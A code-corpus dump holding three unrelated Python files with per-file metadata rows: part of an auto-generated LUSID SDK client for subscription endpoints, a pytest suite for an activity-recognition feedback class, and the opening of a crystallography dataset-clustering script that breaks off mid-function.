len(local_var_params['code']) > 64): # noqa: E501
raise ApiValueError("Invalid value for parameter `code` when calling `get_subscription`, length must be less than or equal to `64`") # noqa: E501
if self.api_client.client_side_validation and ('code' in local_var_params and # noqa: E501
len(local_var_params['code']) < 1): # noqa: E501
raise ApiValueError("Invalid value for parameter `code` when calling `get_subscription`, length must be greater than or equal to `1`") # noqa: E501
if self.api_client.client_side_validation and 'code' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['code']): # noqa: E501
raise ApiValueError("Invalid value for parameter `code` when calling `get_subscription`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'scope' in local_var_params:
path_params['scope'] = local_var_params['scope'] # noqa: E501
if 'code' in local_var_params:
path_params['code'] = local_var_params['code'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
header_params['Accept-Encoding'] = "gzip, deflate, br"
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
response_types_map = {
200: "SubscriptionDetail",
400: "LusidValidationProblemDetails",
404: "str",
}
return self.api_client.call_api(
'/api/subscriptions/{scope}/{code}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def list_subscriptions(self, **kwargs): # noqa: E501
"""[EXPERIMENTAL] ListSubscriptions: List subscriptions. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_subscriptions(async_req=True)
>>> result = thread.get()
:param filter: Expression to filter the result set. Read more about <see href=\"https://support.lusid.com/filtering-results-from-lusid\"> filtering results from LUSID</see>.
:type filter: str
:param sort_by: Fields to order the result set. Read more about <see href=\"https://support.lusid.com/filtering-results-from-lusid\" /> filtering results from LUSID.
:type sort_by: str
:param page: Encoded page string returned from a previous search result that will retrieve the next page of data. When this field is supplied the filter field should not be supplied.
:type page: str
:param limit: The maximum number of subscriptions to retrieve.
:type limit: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: ResourceListOfSubscription
"""
kwargs['_return_http_data_only'] = True
return self.list_subscriptions_with_http_info(**kwargs) # noqa: E501
def list_subscriptions_with_http_info(self, **kwargs): # noqa: E501
"""[EXPERIMENTAL] ListSubscriptions: List subscriptions. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_subscriptions_with_http_info(async_req=True)
>>> result = thread.get()
:param filter: Expression to filter the result set. Read more about <see href=\"https://support.lusid.com/filtering-results-from-lusid\"> filtering results from LUSID</see>.
:type filter: str
:param sort_by: Fields to order the result set. Read more about <see href=\"https://support.lusid.com/filtering-results-from-lusid\" /> filtering results from LUSID.
:type sort_by: str
:param page: Encoded page string returned from a previous search result that will retrieve the next page of data. When this field is supplied the filter field should not be supplied.
:type page: str
:param limit: The maximum number of subscriptions to retrieve.
:type limit: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(ResourceListOfSubscription, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'filter',
'sort_by',
'page',
'limit'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_subscriptions" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
if self.api_client.client_side_validation and ('filter' in local_var_params and # noqa: E501
len(local_var_params['filter']) > 16384): # noqa: E501
raise ApiValueError("Invalid value for parameter `filter` when calling `list_subscriptions`, length must be less than or equal to `16384`") # noqa: E501
if self.api_client.client_side_validation and ('filter' in local_var_params and # noqa: E501
len(local_var_params['filter']) < 0): # noqa: E501
raise ApiValueError("Invalid value for parameter `filter` when calling `list_subscriptions`, length must be greater than or equal to `0`") # noqa: E501
if self.api_client.client_side_validation and 'filter' in local_var_params and not re.search(r'^[\s\S]*$', local_var_params['filter']): # noqa: E501
raise ApiValueError("Invalid value for parameter `filter` when calling `list_subscriptions`, must conform to the pattern `/^[\s\S]*$/`") # noqa: E501
if self.api_client.client_side_validation and ('sort_by' in local_var_params and # noqa: E501
len(local_var_params['sort_by']) > 16384): # noqa: E501
raise ApiValueError("Invalid value for parameter `sort_by` when calling `list_subscriptions`, length must be less than or equal to `16384`") # noqa: E501
if self.api_client.client_side_validation and ('sort_by' in local_var_params and # noqa: E501
len(local_var_params['sort_by']) < 1): # noqa: E501
raise ApiValueError("Invalid value for parameter `sort_by` when calling `list_subscriptions`, length must be greater than or equal to `1`") # noqa: E501
if self.api_client.client_side_validation and 'sort_by' in local_var_params and not re.search(r'^[\s\S]*$', local_var_params['sort_by']): # noqa: E501
raise ApiValueError("Invalid value for parameter `sort_by` when calling `list_subscriptions`, must conform to the pattern `/^[\s\S]*$/`") # noqa: E501
if self.api_client.client_side_validation and ('page' in local_var_params and # noqa: E501
len(local_var_params['page']) > 500): # noqa: E501
raise ApiValueError("Invalid value for parameter `page` when calling `list_subscriptions`, length must be less than or equal to `500`") # noqa: E501
if self.api_client.client_side_validation and ('page' in local_var_params and # noqa: E501
len(local_var_params['page']) < 1): # noqa: E501
raise ApiValueError("Invalid value for parameter `page` when calling `list_subscriptions`, length must be greater than or equal to `1`") # noqa: E501
if self.api_client.client_side_validation and 'page' in local_var_params and not re.search(r'^[a-zA-Z0-9\+\/]*={0,3}$', local_var_params['page']): # noqa: E501
raise ApiValueError("Invalid value for parameter `page` when calling `list_subscriptions`, must conform to the pattern `/^[a-zA-Z0-9\+\/]*={0,3}$/`") # noqa: E501
if self.api_client.client_side_validation and 'limit' in local_var_params and local_var_params['limit'] > 5000: # noqa: E501
raise ApiValueError("Invalid value for parameter `limit` when calling `list_subscriptions`, must be a value less than or equal to `5000`") # noqa: E501
if self.api_client.client_side_validation and 'limit' in local_var_params and local_var_params['limit'] < 1: # noqa: E501
raise ApiValueError("Invalid value for parameter `limit` when calling `list_subscriptions`, must be a value greater than or equal to `1`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'filter' in local_var_params and local_var_params['filter'] is not None: # noqa: E501
query_params.append(('filter', local_var_params['filter'])) # noqa: E501
if 'sort_by' in local_var_params and local_var_params['sort_by'] is not None: # noqa: E501
query_params.append(('sortBy', local_var_params['sort_by'])) # noqa: E501
if 'page' in local_var_params and local_var_params['page'] is not None: # noqa: E501
query_params.append(('page', local_var_params['page'])) # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
header_params['Accept-Encoding'] = "gzip, deflate, br"
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
response_types_map = {
200: "ResourceListOfSubscription",
400: "LusidValidationProblemDetails",
}
return self.api_client.call_api(
'/api/subscriptions', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def update_subscription(self, scope, code, update_subscription, **kwargs): # noqa: E501
"""[EXPERIMENTAL] UpdateSubscription: Update an existing subscription. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_subscription(scope, code, update_subscription, async_req=True)
>>> result = thread.get()
:param scope: The scope that identifies a subscription (required)
:type scope: str
:param code: The code that identifies a subscription (required)
:type code: str
:param update_subscription: The data to update a subscription (required)
:type update_subscription: UpdateSubscription
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: Subscription
"""
kwargs['_return_http_data_only'] = True
return self.update_subscription_with_http_info(scope, code, update_subscription, **kwargs) # noqa: E501
def update_subscription_with_http_info(self, scope, code, update_subscription, **kwargs): # noqa: E501
"""[EXPERIMENTAL] UpdateSubscription: Update an existing subscription. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_subscription_with_http_info(scope, code, update_subscription, async_req=True)
>>> result = thread.get()
:param scope: The scope that identifies a subscription (required)
:type scope: str
:param code: The code that identifies a subscription (required)
:type code: str
:param update_subscription: The data to update a subscription (required)
:type update_subscription: UpdateSubscription
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(Subscription, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'scope',
'code',
'update_subscription'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method update_subscription" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'scope' is set
if self.api_client.client_side_validation and ('scope' not in local_var_params or # noqa: E501
local_var_params['scope'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `scope` when calling `update_subscription`") # noqa: E501
# verify the required parameter 'code' is set
if self.api_client.client_side_validation and ('code' not in local_var_params or # noqa: E501
local_var_params['code'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `code` when calling `update_subscription`") # noqa: E501
# verify the required parameter 'update_subscription' is set
if self.api_client.client_side_validation and ('update_subscription' not in local_var_params or # noqa: E501
local_var_params['update_subscription'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `update_subscription` when calling `update_subscription`") # noqa: E501
if self.api_client.client_side_validation and ('scope' in local_var_params and # noqa: E501
len(local_var_params['scope']) > 64): # noqa: E501
raise ApiValueError("Invalid value for parameter `scope` when calling `update_subscription`, length must be less than or equal to `64`") # noqa: E501
if self.api_client.client_side_validation and ('scope' in local_var_params and # noqa: E501
len(local_var_params['scope']) < 1): # noqa: E501
raise ApiValueError("Invalid value for parameter `scope` when calling `update_subscription`, length must be greater than or equal to `1`") # noqa: E501
if self.api_client.client_side_validation and 'scope' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['scope']): # noqa: E501
raise ApiValueError("Invalid value for parameter `scope` when calling `update_subscription`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`") # noqa: E501
if self.api_client.client_side_validation and ('code' in local_var_params and # noqa: E501
len(local_var_params['code']) > 64): # noqa: E501
raise ApiValueError("Invalid value for parameter `code` when calling `update_subscription`, length must be less than or equal to `64`") # noqa: E501
if self.api_client.client_side_validation and ('code' in local_var_params and # noqa: E501
len(local_var_params['code']) < 1): # noqa: E501
raise ApiValueError("Invalid value for parameter `code` when calling `update_subscription`, length must be greater than or equal to `1`") # noqa: E501
if self.api_client.client_side_validation and 'code' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['code']): # noqa: E501
raise ApiValueError("Invalid value for parameter `code` when calling `update_subscription`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'scope' in local_var_params:
path_params['scope'] = local_var_params['scope'] # noqa: E501
if 'code' in local_var_params:
path_params['code'] = local_var_params['code'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'update_subscription' in local_var_params:
body_params = local_var_params['update_subscription']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
header_params['Accept-Encoding'] = "gzip, deflate, br"
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json-patch+json', 'application/json', 'text/json', 'application/*+json']) # noqa: E501
# set the LUSID header
header_params['X-LUSID-SDK-Language'] = 'Python'
header_params['X-LUSID-SDK-Version'] = '0.1.317'
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
response_types_map = {
200: "Subscription",
400: "LusidValidationProblemDetails",
404: "str",
}
return self.api_client.call_api(
'/api/subscriptions/{scope}/{code}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
| 53.374282
| 191
| 0.609951
| 5,329
| 46,489
| 5.103397
| 0.048977
| 0.046772
| 0.075673
| 0.028828
| 0.962053
| 0.953596
| 0.948926
| 0.943521
| 0.926055
| 0.921974
| 0
| 0.020422
| 0.309019
| 46,489
| 870
| 192
| 53.435632
| 0.826199
| 0.385532
| 0
| 0.668213
| 1
| 0.067285
| 0.268787
| 0.056179
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025522
| false
| 0
| 0.011601
| 0
| 0.062645
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
106b02c16977d1853f13ed3c80519c371f0c4234
| 13,880
|
py
|
Python
|
tests/test_activity_recognition_feedback.py
|
darpa-sail-on/sail-on-client
|
1fd7c0ec359469040fd7af0c8e56fe53277d4a27
|
[
"Apache-2.0"
] | 1
|
2021-04-12T17:20:54.000Z
|
2021-04-12T17:20:54.000Z
|
tests/test_activity_recognition_feedback.py
|
darpa-sail-on/sail-on-client
|
1fd7c0ec359469040fd7af0c8e56fe53277d4a27
|
[
"Apache-2.0"
] | 92
|
2021-03-08T22:32:15.000Z
|
2022-03-25T03:53:01.000Z
|
tests/test_activity_recognition_feedback.py
|
darpa-sail-on/sail-on-client
|
1fd7c0ec359469040fd7af0c8e56fe53277d4a27
|
[
"Apache-2.0"
] | null | null | null |
"""Tests for Activity Recognition Feedback."""
import pytest
import os
import numpy as np
from sail_on_client.feedback.activity_recognition_feedback import (
ActivityRecognitionFeedback,
)
from sail_on_client.harness.par_harness import ParHarness
FEEDBACK_BUDGET = 5
feedback_image_ids = [
"91e68de4-92d1-4e4e-b6d1-8d01a8fe2cf8.mp4",
"7035526b-4d00-4ffa-9177-2c02dd13834b.mp4",
"43c3c705-a57b-4e2b-8cd0-91fc15e34449.mp4",
"7fcebe2f-e133-4ad1-ae27-eb53d0e0b97e.mp4",
"42cb4d19-0186-4168-a169-b753c57aa8d9.avi",
]
feedback_labels = [
[
"putting on foundation",
"putting on mascara",
"putting on eyeliner",
"dyeing eyebrows",
"applying cream",
],
[
"putting on eyeliner",
"dyeing eyebrows",
"applying cream",
"putting in contact lenses",
"putting on foundation",
],
[
"putting on mascara",
"putting on foundation",
"putting on eyeliner",
"scrubbing face",
"dyeing eyebrows",
],
[
"putting on eyeliner",
"putting on foundation",
"putting in contact lenses",
"raising eyebrows",
"trimming or shaving beard",
],
[
"applying cream",
"putting on eyeliner",
"raising eyebrows",
"scrubbing face",
"putting on foundation",
],
]
def _initialize_session(par_interface, protocol_name, hints=()):
"""
Private function to initialize session.
Args:
par_interface (ParHarness): An instance of ParHarness
protocol_name (str): Name of the protocol
hints (list[str]): Hints used in session request
Return:
session id, test_ids
"""
test_id = "OND.0.10100.6438158"
# Testing if session was sucessfully initalized
session_id = par_interface.session_request(
[test_id], f"{protocol_name}", "activity_recognition", "0.1.1", list(hints), 0.5
)
return session_id, test_id
@pytest.mark.parametrize(
"feedback_mapping", (("classification", ("detection", "classification")),)
)
@pytest.mark.parametrize("protocol_name", ["OND"])
def test_initialize(
server_setup, get_par_harness_params, feedback_mapping, protocol_name
):
"""
Test feedback initialization.
Args:
server_setup (tuple): Tuple containing url and result directory
get_par_harness_params (tuple): Tuple to configure par interface
feedback_mapping (dict): Dict with mapping for feedback
protocol_name (str): Name of the protocol ( options: OND and CONDDA)
Return:
None
"""
url, save_directory = get_par_harness_params
par_interface = ParHarness(url, save_directory)
session_id, test_id = _initialize_session(par_interface, protocol_name)
protocol_constant = feedback_mapping[0]
ActivityRecognitionFeedback(
FEEDBACK_BUDGET,
FEEDBACK_BUDGET,
FEEDBACK_BUDGET,
par_interface,
session_id,
test_id,
protocol_constant,
)
@pytest.mark.parametrize(
"feedback_mapping", (("classification", ("detection", "classification")),)
)
@pytest.mark.parametrize("protocol_name", ["OND"])
def test_get_labelled_feedback(
server_setup, get_par_harness_params, feedback_mapping, protocol_name
):
"""
Test get feedback.
Args:
server_setup (tuple): Tuple containing url and result directory
get_par_harness_params (tuple): Tuple to configure par interface
feedback_mapping (dict): Dict with mapping for feedback
protocol_name (str): Name of the protocol ( options: OND and CONDDA)
Return:
None
"""
url, save_directory = get_par_harness_params
par_interface = ParHarness(url, save_directory)
session_id, test_id = _initialize_session(par_interface, protocol_name)
result_files = {}
result_folder = os.path.join(
os.path.dirname(__file__), "mock_results", "activity_recognition"
)
protocol_constant = feedback_mapping[0]
required_files = feedback_mapping[1]
for required_file in required_files:
result_files[required_file] = os.path.join(
result_folder,
f"{test_id}_PreComputed{protocol_name}Agent_{required_file}.csv",
)
par_interface.post_results(result_files, f"{test_id}", 0, session_id)
ar_feedback = ActivityRecognitionFeedback(
FEEDBACK_BUDGET,
FEEDBACK_BUDGET,
FEEDBACK_BUDGET,
par_interface,
session_id,
test_id,
protocol_constant,
)
df_labelled = ar_feedback.get_feedback(
0, list(range(FEEDBACK_BUDGET)), feedback_image_ids
)
assert all(df_labelled.id == feedback_image_ids)
assert (
df_labelled[["class1", "class2", "class3", "class4", "class5"]].values.tolist()
== feedback_labels
)
@pytest.mark.parametrize(
"feedback_mapping", (("detection", ("detection", "classification")),)
)
@pytest.mark.parametrize("protocol_name", ["OND"])
def test_get_detection_feedback(
server_setup, get_par_harness_params, feedback_mapping, protocol_name
):
"""
Test get feedback.
Args:
server_setup (tuple): Tuple containing url and result directory
get_par_harness_params (tuple): Tuple to configure par interface
feedback_mapping (dict): Dict with mapping for feedback
protocol_name (str): Name of the protocol ( options: OND and CONDDA)
Return:
None
"""
url, save_directory = get_par_harness_params
par_interface = ParHarness(url, save_directory)
session_id, test_id = _initialize_session(par_interface, protocol_name)
result_files = {}
result_folder = os.path.join(
os.path.dirname(__file__), "mock_results", "activity_recognition"
)
protocol_constant = feedback_mapping[0]
required_files = feedback_mapping[1]
for required_file in required_files:
result_files[required_file] = os.path.join(
result_folder,
f"{test_id}_PreComputed{protocol_name}Agent_{required_file}.csv",
)
par_interface.post_results(result_files, f"{test_id}", 0, session_id)
ar_feedback = ActivityRecognitionFeedback(
FEEDBACK_BUDGET,
FEEDBACK_BUDGET,
FEEDBACK_BUDGET,
par_interface,
session_id,
test_id,
protocol_constant,
)
df_labelled = ar_feedback.get_feedback(
0, list(range(FEEDBACK_BUDGET)), feedback_image_ids
)
assert all(df_labelled.id == feedback_image_ids)
@pytest.mark.parametrize(
"feedback_mapping",
(("detection_and_classification", ("detection", "classification")),),
)
@pytest.mark.parametrize("protocol_name", ["OND"])
def test_get_detection_and_classification_feedback(
server_setup, get_par_harness_params, feedback_mapping, protocol_name
):
"""
Test get feedback.
Args:
server_setup (tuple): Tuple containing url and result directory
get_par_harness_params (tuple): Tuple to configure par interface
feedback_mapping (dict): Dict with mapping for feedback
protocol_name (str): Name of the protocol ( options: OND and CONDDA)
Return:
None
"""
url, save_directory = get_par_harness_params
par_interface = ParHarness(url, save_directory)
session_id, test_id = _initialize_session(par_interface, protocol_name)
result_files = {}
result_folder = os.path.join(
os.path.dirname(__file__), "mock_results", "activity_recognition"
)
protocol_constant = feedback_mapping[0]
required_files = feedback_mapping[1]
for required_file in required_files:
result_files[required_file] = os.path.join(
result_folder,
f"{test_id}_PreComputed{protocol_name}Agent_{required_file}.csv",
)
par_interface.post_results(result_files, f"{test_id}", 0, session_id)
ar_feedback = ActivityRecognitionFeedback(
FEEDBACK_BUDGET,
FEEDBACK_BUDGET,
FEEDBACK_BUDGET,
par_interface,
session_id,
test_id,
protocol_constant,
)
df_labelled = ar_feedback.get_feedback(
0, list(range(FEEDBACK_BUDGET)), feedback_image_ids
)
assert all(df_labelled.id == feedback_image_ids)
@pytest.mark.parametrize(
"feedback_mapping", (("score", ("detection", "classification")),)
)
@pytest.mark.parametrize("protocol_name", ["OND"])
def test_get_score_feedback(
server_setup, get_par_harness_params, feedback_mapping, protocol_name
):
"""
Test get feedback.
Args:
server_setup (tuple): Tuple containing url and result directory
get_par_harness_params (tuple): Tuple to configure par interface
feedback_mapping (dict): Dict with mapping for feedback
protocol_name (str): Name of the protocol ( options: OND and CONDDA)
Return:
None
"""
url, save_directory = get_par_harness_params
par_interface = ParHarness(url, save_directory)
session_id, test_id = _initialize_session(par_interface, protocol_name)
result_files = {}
result_folder = os.path.join(
os.path.dirname(__file__), "mock_results", "activity_recognition"
)
protocol_constant = feedback_mapping[0]
required_files = feedback_mapping[1]
for required_file in required_files:
result_files[required_file] = os.path.join(
result_folder,
f"{test_id}_PreComputed{protocol_name}Agent_{required_file}.csv",
)
par_interface.post_results(result_files, f"{test_id}", 0, session_id)
feedback = ActivityRecognitionFeedback(
FEEDBACK_BUDGET,
FEEDBACK_BUDGET,
FEEDBACK_BUDGET,
par_interface,
session_id,
test_id,
protocol_constant,
)
df_score = feedback.get_feedback(
0, list(range(FEEDBACK_BUDGET)), feedback_image_ids
)
assert np.isclose(df_score[1][0], 0.0, atol=1e-05)
@pytest.mark.parametrize(
"feedback_mapping",
(
("classification", ("detection", "classification")),
("score", ("detection", "classification")),
),
)
@pytest.mark.parametrize("protocol_name", ["OND"])
def test_get_feedback(
server_setup, get_par_harness_params, feedback_mapping, protocol_name
):
"""
Test get feedback.
Args:
server_setup (tuple): Tuple containing url and result directory
get_par_harness_params (tuple): Tuple to configure par interface
feedback_mapping (dict): Dict with mapping for feedback
protocol_name (str): Name of the protocol ( options: OND and CONDDA)
Return:
None
"""
url, save_directory = get_par_harness_params
par_interface = ParHarness(url, save_directory)
session_id, test_id = _initialize_session(par_interface, protocol_name)
result_files = {}
result_folder = os.path.join(
os.path.dirname(__file__), "mock_results", "activity_recognition"
)
protocol_constant = feedback_mapping[0]
required_files = feedback_mapping[1]
for required_file in required_files:
result_files[required_file] = os.path.join(
result_folder,
f"{test_id}_PreComputed{protocol_name}Agent_{required_file}.csv",
)
par_interface.post_results(result_files, f"{test_id}", 0, session_id)
ar_feedback = ActivityRecognitionFeedback(
FEEDBACK_BUDGET,
FEEDBACK_BUDGET,
FEEDBACK_BUDGET,
par_interface,
session_id,
test_id,
protocol_constant,
)
ar_feedback.get_feedback(0, list(range(FEEDBACK_BUDGET)), feedback_image_ids)
@pytest.mark.parametrize(
"feedback_mapping", (("classification", ("detection", "classification")),)
)
@pytest.mark.parametrize("protocol_name", ["OND"])
def test_deposit_income(
server_setup, get_par_harness_params, feedback_mapping, protocol_name
):
"""
Test deposit income.
Args:
server_setup (tuple): Tuple containing url and result directory
get_par_harness_params (tuple): Tuple to configure par interface
feedback_mapping (dict): Dict with mapping for feedback
protocol_name (str): Name of the protocol ( options: OND and CONDDA)
Return:
None
"""
url, save_directory = get_par_harness_params
par_interface = ParHarness(url, save_directory)
session_id, test_id = _initialize_session(par_interface, protocol_name)
protocol_constant = feedback_mapping[0]
ar_feedback = ActivityRecognitionFeedback(
FEEDBACK_BUDGET,
FEEDBACK_BUDGET,
FEEDBACK_BUDGET,
par_interface,
session_id,
test_id,
protocol_constant,
)
ar_feedback.deposit_income()
assert ar_feedback.budget == FEEDBACK_BUDGET
@pytest.mark.parametrize(
"feedback_mapping", (("classification", ("detection", "classification")),)
)
@pytest.mark.parametrize("protocol_name", ["OND"])
def test_get_budget(
server_setup, get_par_harness_params, feedback_mapping, protocol_name
):
"""
Test get budget.
Args:
server_setup (tuple): Tuple containing url and result directory
get_par_harness_params (tuple): Tuple to configure par interface
feedback_mapping (dict): Dict with mapping for feedback
protocol_name (str): Name of the protocol ( options: OND and CONDDA)
Return:
None
"""
url, save_directory = get_par_harness_params
par_interface = ParHarness(url, save_directory)
session_id, test_id = _initialize_session(par_interface, protocol_name)
protocol_constant = feedback_mapping[0]
ar_feedback = ActivityRecognitionFeedback(
FEEDBACK_BUDGET,
FEEDBACK_BUDGET,
FEEDBACK_BUDGET,
par_interface,
session_id,
test_id,
protocol_constant,
)
assert ar_feedback.get_budget() == FEEDBACK_BUDGET
| 31.834862
| 88
| 0.681412
| 1,576
| 13,880
| 5.678934
| 0.100888
| 0.053631
| 0.03486
| 0.05095
| 0.86257
| 0.857095
| 0.84648
| 0.842905
| 0.815307
| 0.815307
| 0
| 0.014685
| 0.224856
| 13,880
| 435
| 89
| 31.908046
| 0.817176
| 0.205187
| 0
| 0.715232
| 0
| 0
| 0.172602
| 0.05008
| 0
| 0
| 0
| 0
| 0.023179
| 1
| 0.029801
| false
| 0
| 0.016556
| 0
| 0.049669
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
52d49f82202b1b344f3f8b735790a4074aa7d006
| 21,992
|
py
|
Python
|
ccCluster/ccCalc.py
|
gsantoni/ccCluster
|
e04055b97b071eb601bf5d021f6cc976c92e5d0b
|
[
"BSD-2-Clause-FreeBSD"
] | 9
|
2017-12-11T08:31:01.000Z
|
2021-05-02T08:05:33.000Z
|
ccCluster/ccCalc.py
|
gsantoni/ccCluster
|
e04055b97b071eb601bf5d021f6cc976c92e5d0b
|
[
"BSD-2-Clause-FreeBSD"
] | 3
|
2020-03-19T13:28:57.000Z
|
2022-03-10T09:50:38.000Z
|
ccCluster/ccCalc.py
|
gsantoni/ccCluster
|
e04055b97b071eb601bf5d021f6cc976c92e5d0b
|
[
"BSD-2-Clause-FreeBSD"
] | 1
|
2020-03-18T09:50:28.000Z
|
2020-03-18T09:50:28.000Z
|
#! /usr/bin/env libtbx.python
from __future__ import print_function
__author__ = "Gianluca Santoni"
__copyright__ = "Copyright 20150-2019"
__credits__ = ["Gianluca Santoni, Alexander Popov"]
__license__ = ""
__version__ = "1.0"
__maintainer__ = "Gianluca Santoni"
__email__ = "gianluca.santoni@esrf.fr"
__status__ = "Beta"
from iotbx.reflection_file_reader import any_reflection_file
from iotbx.xds.integrate_hkl import reader
import cctbx.miller as mil
from math import *
import collections
import itertools
import argparse
import struct
import os
import multiprocessing
###
#Load files and create arrays
#
######
#Class to calc correlation on all data in tree of subfolders
class ccCalc():
"""
docsting here
This clas is used to calculate distances based on the cc between the datasets.
it works when no input files is provided.
"""
def __init__(self):
self.LogFile=open('ccClusterLog.txt', 'w')
self.CurrentDir= os.getcwd()
self.argList=[]
for root, dirs, files in os.walk('.'):
directory=root.lstrip('.')
folder=self.CurrentDir+directory
if 'XDS_ASCII.HKL' in files:
self.argList.append(folder+'/XDS_ASCII.HKL')
self.Arrays= self.loadReflections()
#self.writeLog()
self.results = self.calcSerial()
#self.writeLog()
def loadReflections(self):
"""
Loads a file using cctbx and puts the corresponding miller array in a dictionary.
Dictionary keys are the filenames given as input.
"""
Arrays = {}
for x in self.argList:
